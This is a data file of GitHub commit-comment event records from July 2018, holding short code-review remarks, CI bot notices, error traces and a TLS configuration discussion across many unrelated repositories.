{"id":"7914196727","type":"CommitCommentEvent","actor":{"login":"triple-underscore"},"repo":{"name":"triple-underscore/triple-underscore.github.io"},"payload":{"comment":{"id":29585031,"position":null,"line":null,"path":null,"commit_id":"1309f4baf4b2fd9cd84077346e9a3b2d513ca492","created_at":"2018-07-03T18:08:21Z","updated_at":"2018-07-03T18:08:21Z","author_association":"OWNER","body":"次の commit も反映：\r\nClarify that if there's a wrap opportunity in the line, content is not allowed to overflow the line.\r\nhttps://github.com/w3c/csswg-drafts/commit/3308dcb6d5dc7747fa0a7bc58c434ed159127814\r\n"}},"created_at":"2018-07-03T18:08:21Z"}
{"id":"7914197078","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"shanegramlich/michelle"},"payload":{"comment":{"id":29585036,"position":1,"line":1,"path":".gitattributes","commit_id":"86021c6b4ef1a1148079ba76b881eb3e4a966d31","created_at":"2018-07-03T18:08:25Z","updated_at":"2018-07-03T18:08:25Z","author_association":"OWNER","body":"That's actually line 2"}},"created_at":"2018-07-03T18:08:25Z"}
{"id":"7914197746","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29585039,"position":48,"line":48,"path":"ui.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T18:08:34Z","updated_at":"2018-07-03T18:08:34Z","author_association":"NONE","body":"можешь конечно оставить модуль, но лучше все же класс\r\nи если оставишь модуль, то правила те же\r\nинтерфейс либо выводит, либо получает и это все"}},"created_at":"2018-07-03T18:08:34Z"}
{"id":"7914203271","type":"CommitCommentEvent","actor":{"login":"kiwijang"},"repo":{"name":"kiwijang/kiwizhang"},"payload":{"comment":{"id":29585055,"position":null,"line":null,"path":null,"commit_id":"acd0b04f4cdd222858e923015f97782ecb4180e5","created_at":"2018-07-03T18:09:43Z","updated_at":"2018-07-03T18:09:43Z","author_association":"OWNER","body":"k/a/"}},"created_at":"2018-07-03T18:09:43Z"}
{"id":"7914203569","type":"CommitCommentEvent","actor":{"login":"DU-jdto"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29585057,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-03T18:09:48Z","updated_at":"2018-07-03T18:09:48Z","author_association":"NONE","body":"Is this really a simplification? I would call not having this bit of code a bug."}},"created_at":"2018-07-03T18:09:48Z"}
{"id":"7914205902","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29585063,"position":34,"line":34,"path":"winner.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T18:10:16Z","updated_at":"2018-07-03T18:10:16Z","author_association":"NONE","body":"здесь тоже мешанина методов интерфейса и логики\r\nтакого быть не должно, см. комментарии выше"}},"created_at":"2018-07-03T18:10:16Z"}
{"id":"7914206734","type":"CommitCommentEvent","actor":{"login":"khaledaazzam"},"repo":{"name":"khaledaazzam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29585067,"position":5,"line":14,"path":"index.html","commit_id":"574c4564eb42920fbfa7843774dd6ec62c82e963","created_at":"2018-07-03T18:10:26Z","updated_at":"2018-07-03T18:10:26Z","author_association":"OWNER","body":"<h3>syria</h3>"}},"created_at":"2018-07-03T18:10:26Z"}
{"id":"7914208501","type":"CommitCommentEvent","actor":{"login":"mbleigh"},"repo":{"name":"firebase/firebase-tools"},"payload":{"comment":{"id":29585073,"position":null,"line":null,"path":null,"commit_id":"d29567bf5d44b9cd510e6699535e32d8573783ee","created_at":"2018-07-03T18:10:47Z","updated_at":"2018-07-03T18:10:47Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-03T18:10:47Z"}
{"id":"7914210617","type":"CommitCommentEvent","actor":{"login":"DarkAbhi"},"repo":{"name":"AxelBlaz3/Codex-Kernel"},"payload":{"comment":{"id":29585077,"position":null,"line":null,"path":null,"commit_id":"fc890be8df11dc4f67949c896285f3d80cfc7857","created_at":"2018-07-03T18:11:14Z","updated_at":"2018-07-03T18:11:14Z","author_association":"NONE","body":"This value will not matter has Android does not utilize a swap partition."}},"created_at":"2018-07-03T18:11:14Z"}
{"id":"7914213419","type":"CommitCommentEvent","actor":{"login":"MannyRamos"},"repo":{"name":"MannyRamos/Char_special_"},"payload":{"comment":{"id":29585085,"position":null,"line":null,"path":null,"commit_id":"ba16fe828f03606caeefdc07684bc9ad6deef010","created_at":"2018-07-03T18:11:50Z","updated_at":"2018-07-03T18:11:50Z","author_association":"OWNER","body":"nice file!\r\n"}},"created_at":"2018-07-03T18:11:50Z"}
{"id":"7914217875","type":"CommitCommentEvent","actor":{"login":"protonesso"},"repo":{"name":"AwlsomeAlex/StarLinux"},"payload":{"comment":{"id":29585103,"position":null,"line":null,"path":null,"commit_id":"72d639b819fff8653d8cf84eb6235c012e3d3ada","created_at":"2018-07-03T18:12:44Z","updated_at":"2018-07-03T18:12:44Z","author_association":"NONE","body":"зачем"}},"created_at":"2018-07-03T18:12:44Z"}
{"id":"7914223647","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29585129,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T18:13:57Z","updated_at":"2018-07-03T18:13:57Z","author_association":"NONE","body":"Also I don't see any point in performing this test series. The current guide lines are good and I see no reason why we suddenly should begin to disrespect them."}},"created_at":"2018-07-03T18:13:57Z"}
{"id":"7914233088","type":"CommitCommentEvent","actor":{"login":"twogee"},"repo":{"name":"apache/ant"},"payload":{"comment":{"id":29585155,"position":5,"line":931,"path":"manual/install.html","commit_id":"b7461ce2e43bda44a1ba5355f78288c85da773bc","created_at":"2018-07-03T18:15:49Z","updated_at":"2018-07-03T18:15:49Z","author_association":"CONTRIBUTOR","body":"Sorry about nitpicking: I would prefer a space between Java and the version.\r\njava.activation.jmod is still there in Java 10, but must be activated by a command-line option.\r\nIt will be gone completely in Java 11, I suppose."}},"created_at":"2018-07-03T18:15:49Z"}
{"id":"7914236878","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29585168,"position":null,"line":null,"path":null,"commit_id":"06c550242d836f8e7d09f8912f6e113b8b4247c9","created_at":"2018-07-03T18:16:34Z","updated_at":"2018-07-03T18:16:34Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loon](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loon).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loon-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T18:16:34Z"}
{"id":"7914239169","type":"CommitCommentEvent","actor":{"login":"mmlado"},"repo":{"name":"deko88/Seat-vacancy"},"payload":{"comment":{"id":29585177,"position":8,"line":8,"path":"app/src/main/java/com/example/deko/classroom/User.java","commit_id":"f0ab50b5e119199b25e6f3f9cabde933d3b8c7d4","created_at":"2018-07-03T18:16:58Z","updated_at":"2018-07-03T18:16:58Z","author_association":"NONE","body":"Is this a user or a student? Maybe call the class student and remove it from names of variables and methods."}},"created_at":"2018-07-03T18:16:58Z"}
{"id":"7914241252","type":"CommitCommentEvent","actor":{"login":"RONTheCookie"},"repo":{"name":"RONTheCookie/discordboats.club"},"payload":{"comment":{"id":29585180,"position":null,"line":null,"path":null,"commit_id":"8d443d04a93ce32080c38026edebf69a9b5b01b7","created_at":"2018-07-03T18:17:22Z","updated_at":"2018-07-03T18:17:22Z","author_association":"OWNER","body":"we had a diff system for this a while ago and that happend while we moved to this one, somehow"}},"created_at":"2018-07-03T18:17:22Z"}
{"id":"7914248242","type":"CommitCommentEvent","actor":{"login":"felixfbecker"},"repo":{"name":"TypeStrong/ts-node"},"payload":{"comment":{"id":29585194,"position":null,"line":null,"path":null,"commit_id":"33cb1b5faecaa652b70fe97cb3665de7d42565c2","created_at":"2018-07-03T18:18:47Z","updated_at":"2018-07-03T18:18:47Z","author_association":"NONE","body":"After updating to v7 I get errors like this:\r\n\r\n```\r\nTSError: ⨯ Unable to compile TypeScript:\r\nsrc/util/url.test.tsx(3,33): error TS7016: Could not find a declaration file for module 'whatwg-url'. '/Users/felix/go/src/github.com/sourcegraph/sourcegraph/web/node_modules/whatwg-url/lib/public-api.js' implicitly has an 'any' type.\r\n  Try `npm install @types/whatwg-url` if it exists or add a new declaration (.d.ts) file containing `declare module 'whatwg-url';`\r\n```\r\n\r\nThis is because the typings are in custom declaration files that are now not anymore auto-loaded. How to solve this?\r\n\r\nI would like to avoid triple-slash references or listing out these files on the command line. tsconfig should be the single source of truth"}},"created_at":"2018-07-03T18:18:47Z"}
{"id":"7914248511","type":"CommitCommentEvent","actor":{"login":"akoshlatyy-vareger"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29585195,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-03T18:18:51Z","updated_at":"2018-07-03T18:18:51Z","author_association":"NONE","body":"Thanks for the quick answer! \r\n7 node example have parameters that with enabled TLS:\r\n`CMD=\"constellation-node --url=https://127.0.0.$i:900$i/ --port=900$i --workdir=$DDIR --socket=tm.ipc --publickeys=tm.pub --privatekeys=tm.key --othernodes=https://127.0.0.1:9001/\"`\r\nBecause it's enabled by default:\r\n`tls = \"strict\"\r\ntlsservertrust = \"tofu\"\r\ntlsclienttrust = \"ca-or-tofu\"` \r\nhave taken from here:\r\nhttps://github.com/jpmorganchase/constellation/blob/master/sample.conf\r\n> I am thinking of adding an optional expert mode, where more information can be entered at creation time.\r\nIt's really Great Idea! It will really help to implement this solution to production with using internet network instead of VPN solution. Here is the explanation of need of TLS from jpmorganchase git repo:\r\n`## TLS status. Options:\r\n##\r\n##   - strict: All connections to and from this node must use TLS with mutual\r\n##     authentication. See the documentation for tlsservertrust and\r\n##     tlsclienttrust below.\r\n##   - off: Mutually authenticated TLS is not used for in- and outbound\r\n##     connections, although unauthenticated connections to HTTPS hosts are\r\n##     still possible. This should only be used if another transport security\r\n##     mechanism like WireGuard is in place.\r\n##\r\n## Default: \"strict\"\r\ntls = \"strict\"`\r\nFrom my side, I'm ready to help you to implement this, but I'm not so familiar with your code, I think we should to work together "}},"created_at":"2018-07-03T18:18:51Z"}
{"id":"7914248606","type":"CommitCommentEvent","actor":{"login":"SvenVminJoy"},"repo":{"name":"SvenVminJoy/LearnForJoy"},"payload":{"comment":{"id":29585196,"position":null,"line":null,"path":null,"commit_id":"0d11c91f06944643e2302426068ab957d5b0e27f","created_at":"2018-07-03T18:18:53Z","updated_at":"2018-07-03T18:18:53Z","author_association":"OWNER","body":"打破魔咒"}},"created_at":"2018-07-03T18:18:53Z"}
{"id":"7914250802","type":"CommitCommentEvent","actor":{"login":"mmlado"},"repo":{"name":"deko88/Seat-vacancy"},"payload":{"comment":{"id":29585205,"position":7,"line":7,"path":"app/src/main/java/com/example/deko/classroom/User.java","commit_id":"f0ab50b5e119199b25e6f3f9cabde933d3b8c7d4","created_at":"2018-07-03T18:19:19Z","updated_at":"2018-07-03T18:19:19Z","author_association":"NONE","body":"Use CTRL+ALT+SHIFT+l in android studio to format the code before doing a commit. (╯°□°）╯︵ ┻━┻"}},"created_at":"2018-07-03T18:19:19Z"}
{"id":"7914254355","type":"CommitCommentEvent","actor":{"login":"troturier"},"repo":{"name":"troturier/Go4Lunch"},"payload":{"comment":{"id":29585209,"position":null,"line":null,"path":null,"commit_id":"91e65266f12d6ee9eb2f4dca03e28db23b9268de","created_at":"2018-07-03T18:20:03Z","updated_at":"2018-07-03T18:20:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Menu](https://trello.com/c/JEH4xrQe/8-menu)"}},"created_at":"2018-07-03T18:20:03Z"}
{"id":"7914270582","type":"CommitCommentEvent","actor":{"login":"hotsnr"},"repo":{"name":"hotsnr/prepack"},"payload":{"comment":{"id":29585241,"position":63,"line":63,"path":"src/utils/ShapeInformation.js","commit_id":"70d85e9257ab19b814eec0f43b0b338168499a61","created_at":"2018-07-03T18:23:22Z","updated_at":"2018-07-03T18:23:22Z","author_association":"OWNER","body":"I followed the pattern in which TypesDomain works and haven't counted for this Flow feature. There is no strong reason so I will switch to your option."}},"created_at":"2018-07-03T18:23:22Z"}
{"id":"7914277874","type":"CommitCommentEvent","actor":{"login":"deanm1278"},"repo":{"name":"lancaster-university/codal-circuit-playground"},"payload":{"comment":{"id":29585256,"position":null,"line":null,"path":null,"commit_id":"32ed1b55348f07488b0bd5c0ca5ac4b1d9884f40","created_at":"2018-07-03T18:24:54Z","updated_at":"2018-07-03T18:24:54Z","author_association":"CONTRIBUTOR","body":"we also need to #include CPlayI2C.h"}},"created_at":"2018-07-03T18:24:54Z"}
{"id":"7914279172","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29585259,"position":null,"line":null,"path":null,"commit_id":"9940504e933d6766f87dca7fccc3c2f889976a22","created_at":"2018-07-03T18:25:12Z","updated_at":"2018-07-03T18:25:12Z","author_association":"MEMBER","body":"got carried out by other things, I'll try again tomorrow."}},"created_at":"2018-07-03T18:25:12Z"}
{"id":"7914298455","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29585297,"position":null,"line":null,"path":null,"commit_id":"5b39b22232797c187db4441cb6e520c6fdd951f3","created_at":"2018-07-03T18:29:12Z","updated_at":"2018-07-03T18:29:12Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jun-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jun-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jun-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T18:29:12Z"}
{"id":"7914298707","type":"CommitCommentEvent","actor":{"login":"Enes5519"},"repo":{"name":"TuranicTeam/Altay"},"payload":{"comment":{"id":29585298,"position":null,"line":null,"path":null,"commit_id":"a2dcaee5da8b54e2dec6d21025008beabe138246","created_at":"2018-07-03T18:29:16Z","updated_at":"2018-07-03T18:29:16Z","author_association":"MEMBER","body":"Bu dosyaların hepsine ne oldu satırları bozulmuş"}},"created_at":"2018-07-03T18:29:16Z"}
{"id":"7914299459","type":"CommitCommentEvent","actor":{"login":"ppchu"},"repo":{"name":"ppchu/musicled"},"payload":{"comment":{"id":29585301,"position":null,"line":null,"path":null,"commit_id":"536639ea70e40f94cac9a431a1564dcc96087a42","created_at":"2018-07-03T18:29:25Z","updated_at":"2018-07-03T18:29:25Z","author_association":"OWNER","body":"@bxrz I used Arduino IDE and did not use Visual Studio"}},"created_at":"2018-07-03T18:29:25Z"}
{"id":"7914300073","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29585303,"position":null,"line":null,"path":null,"commit_id":"d980282e289da062f42db3ee48bfdaa089a761f0","created_at":"2018-07-03T18:29:32Z","updated_at":"2018-07-03T18:29:32Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-tandem4](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-tandem4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-tandem4-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T18:29:32Z"}
{"id":"7914307675","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29585320,"position":null,"line":null,"path":null,"commit_id":"ee3d20fd669c1142f57b6928f48393183a244b1c","created_at":"2018-07-03T18:31:05Z","updated_at":"2018-07-03T18:31:05Z","author_association":"COLLABORATOR","body":"Previously, regex would simply assume the word after the first number (\\d+) found is where to look for for moniker."}},"created_at":"2018-07-03T18:31:05Z"}
{"id":"7914313580","type":"CommitCommentEvent","actor":{"login":"lichray"},"repo":{"name":"cplusplus/draft"},"payload":{"comment":{"id":29585334,"position":31,"line":1977,"path":"source/expressions.tex","commit_id":"fa323da9d0896fce007d70b5445d99bf3298027f","created_at":"2018-07-03T18:32:17Z","updated_at":"2018-07-03T18:32:17Z","author_association":"CONTRIBUTOR","body":"Are you sure that doesn't run into a circulating specification?"}},"created_at":"2018-07-03T18:32:17Z"}
{"id":"7914315733","type":"CommitCommentEvent","actor":{"login":"dan-katz"},"repo":{"name":"dan-katz/blueprint"},"payload":{"comment":{"id":29585335,"position":null,"line":null,"path":null,"commit_id":"c133b0b6f7f7c1ca0ec0931b6aa6a40098faaaec","created_at":"2018-07-03T18:32:43Z","updated_at":"2018-07-03T18:32:43Z","author_association":"OWNER","body":"<h3>Publish (#2628)</h3>\n\nPreview: <strong><a href='https://39-127456300-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://39-127456300-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://39-127456300-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-03T18:32:43Z"}
{"id":"7914316615","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29585345,"position":null,"line":null,"path":null,"commit_id":"38a22c264ae153c20b27e0da5f59e52d6727e93f","created_at":"2018-07-03T18:32:54Z","updated_at":"2018-07-03T18:32:54Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-32](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-03T18:32:54Z"}
{"id":"7914316913","type":"CommitCommentEvent","actor":{"login":"alxiddqd"},"repo":{"name":"alxiddqd/headsup_study"},"payload":{"comment":{"id":29585346,"position":3,"line":3,"path":"README.md","commit_id":"69b579e6318583e311245445b6cac3e06d304d08","created_at":"2018-07-03T18:32:57Z","updated_at":"2018-07-03T18:32:57Z","author_association":"OWNER","body":"omg learning"}},"created_at":"2018-07-03T18:32:57Z"}
{"id":"7914320600","type":"CommitCommentEvent","actor":{"login":"khaledaazzam"},"repo":{"name":"khaledaazzam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29585355,"position":null,"line":null,"path":null,"commit_id":"5e9b2018d2e30bf8d278489f08e62339b0d04f91","created_at":"2018-07-03T18:33:41Z","updated_at":"2018-07-03T18:33:41Z","author_association":"OWNER","body":"i like going to syria"}},"created_at":"2018-07-03T18:33:41Z"}
{"id":"7914322383","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29585358,"position":null,"line":null,"path":null,"commit_id":"736f1f017da040734d9ea26d38d27a1b1dd8225e","created_at":"2018-07-03T18:34:02Z","updated_at":"2018-07-03T18:34:02Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T18:34:02Z"}
{"id":"7914329327","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29585364,"position":16,"line":49,"path":"src/testing/KonfigurationTest.java","commit_id":"fa1abc987fda2981a436cde5261ec876df68d5b3","created_at":"2018-07-03T18:35:23Z","updated_at":"2018-07-03T18:35:23Z","author_association":"COLLABORATOR","body":"Zeile 49 von dieses Kommit\r\njava.lang.AssertionError: \r\nExpected :267.0\r\nActual   :-101.0\r\n\r\n\tat org.junit.Assert.fail(Assert.java:88)\r\n\tat org.junit.Assert.failNotEquals(Assert.java:834)\r\n\tat org.junit.Assert.assertEquals(Assert.java:553)\r\n\tat org.junit.Assert.assertEquals(Assert.java:683)\r\n\tat testing.KonfigurationTest.evaluateCalcMannMonate(KonfigurationTest.java:49)\r\n"}},"created_at":"2018-07-03T18:35:23Z"}
{"id":"7914331297","type":"CommitCommentEvent","actor":{"login":"shivamadurai"},"repo":{"name":"shivamadurai/es6-data-munging"},"payload":{"comment":{"id":29585368,"position":null,"line":null,"path":null,"commit_id":"686baf67385b4ac09ecc62f88a486082712d1569","created_at":"2018-07-03T18:35:48Z","updated_at":"2018-07-03T18:35:48Z","author_association":"OWNER","body":"Time Duration for Data Munging - (data munging: 14358.971ms)"}},"created_at":"2018-07-03T18:35:48Z"}
{"id":"7914331813","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29585370,"position":null,"line":null,"path":null,"commit_id":"6b0d5849c3082a223c082244c9e6e4dd6a13058a","created_at":"2018-07-03T18:35:55Z","updated_at":"2018-07-03T18:35:55Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loon](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loon).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loon-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T18:35:55Z"}
{"id":"7914332002","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29585371,"position":null,"line":null,"path":null,"commit_id":"14b99e34307001df9e58a286c3fbf338e3bbc803","created_at":"2018-07-03T18:35:57Z","updated_at":"2018-07-03T18:35:57Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T18:35:57Z"}
{"id":"7914332741","type":"CommitCommentEvent","actor":{"login":"kiyora20"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29585372,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-03T18:36:07Z","updated_at":"2018-07-03T18:36:07Z","author_association":"NONE","body":"please!! share new script!!\r\n\r\nYou are my hero!!"}},"created_at":"2018-07-03T18:36:07Z"}
{"id":"7914334401","type":"CommitCommentEvent","actor":{"login":"Albe96XDA"},"repo":{"name":"Albe96XDA/android_device_samsung_nobleltejv"},"payload":{"comment":{"id":29585374,"position":null,"line":null,"path":null,"commit_id":"25975a525d97e093b4da4a0d2fe5996fe46b39b0","created_at":"2018-07-03T18:36:28Z","updated_at":"2018-07-03T18:36:28Z","author_association":"OWNER","body":"lol.it's nobleltejv"}},"created_at":"2018-07-03T18:36:28Z"}
{"id":"7914336121","type":"CommitCommentEvent","actor":{"login":"ikathegreat"},"repo":{"name":"ikathegreat/roicalc"},"payload":{"comment":{"id":29585380,"position":null,"line":null,"path":null,"commit_id":"8450cdc18f7da2f68aeafd56dd2a689a4fa16303","created_at":"2018-07-03T18:36:50Z","updated_at":"2018-07-03T18:36:50Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/4453090/42238337-5c0e4b86-7eb5-11e8-999b-6d6e6f9cd8ef.png)\r\nseems like this isn't working"}},"created_at":"2018-07-03T18:36:50Z"}
{"id":"7914340924","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29585392,"position":null,"line":null,"path":null,"commit_id":"d541db4bf536506062859b4346016314904eb3d9","created_at":"2018-07-03T18:37:51Z","updated_at":"2018-07-03T18:37:51Z","author_association":"COLLABORATOR","body":"Ok I'm gonna continue testing it tomorrow."}},"created_at":"2018-07-03T18:37:51Z"}
{"id":"7914341896","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29585393,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-03T18:38:03Z","updated_at":"2018-07-03T18:38:03Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-03T18:38:03Z"}
{"id":"7914342535","type":"CommitCommentEvent","actor":{"login":"bxrz"},"repo":{"name":"ppchu/musicled"},"payload":{"comment":{"id":29585395,"position":null,"line":null,"path":null,"commit_id":"536639ea70e40f94cac9a431a1564dcc96087a42","created_at":"2018-07-03T18:38:12Z","updated_at":"2018-07-03T18:38:12Z","author_association":"NONE","body":"Okay, when I try to verify this code in Arduino. I get the error \"import does not name a type\". Is this code needed to complete this MusicLED project, or do you just need the other code you posted? "}},"created_at":"2018-07-03T18:38:12Z"}
{"id":"7914343189","type":"CommitCommentEvent","actor":{"login":"jrouzierinverse"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":29585396,"position":null,"line":null,"path":null,"commit_id":"1cfe5a37123600273e9a0c954387cef95ba88ca5","created_at":"2018-07-03T18:38:19Z","updated_at":"2018-07-03T18:38:19Z","author_association":"MEMBER","body":"Sorry fixed in e2d4617d7c9033eb9c3b223a10f4b1a1277d95b0"}},"created_at":"2018-07-03T18:38:19Z"}
{"id":"7914347294","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29585404,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-03T18:39:11Z","updated_at":"2018-07-03T18:39:11Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-03T18:39:11Z"}
{"id":"7914349741","type":"CommitCommentEvent","actor":{"login":"dhyansraj"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29585407,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-03T18:39:43Z","updated_at":"2018-07-03T18:39:43Z","author_association":"COLLABORATOR","body":"Can you make modifications to a generated node and make the TLS work? Then you can tell me what all you did and I can auto generate them. Do you need node.conf to pass these additional parameters ? If so I will bring it back in development branch"}},"created_at":"2018-07-03T18:39:43Z"}
{"id":"7914357961","type":"CommitCommentEvent","actor":{"login":"mmlado"},"repo":{"name":"deko88/Seat-vacancy"},"payload":{"comment":{"id":29585422,"position":44,"line":44,"path":"app/src/main/java/com/example/deko/classroom/Profile.java","commit_id":"02c891a5e6e884985da61677a3c608752f53269d","created_at":"2018-07-03T18:41:27Z","updated_at":"2018-07-03T18:41:27Z","author_association":"NONE","body":"I'm not sure what this line does. It might give you the user table? Please, correct me if I'm wrong."}},"created_at":"2018-07-03T18:41:27Z"}
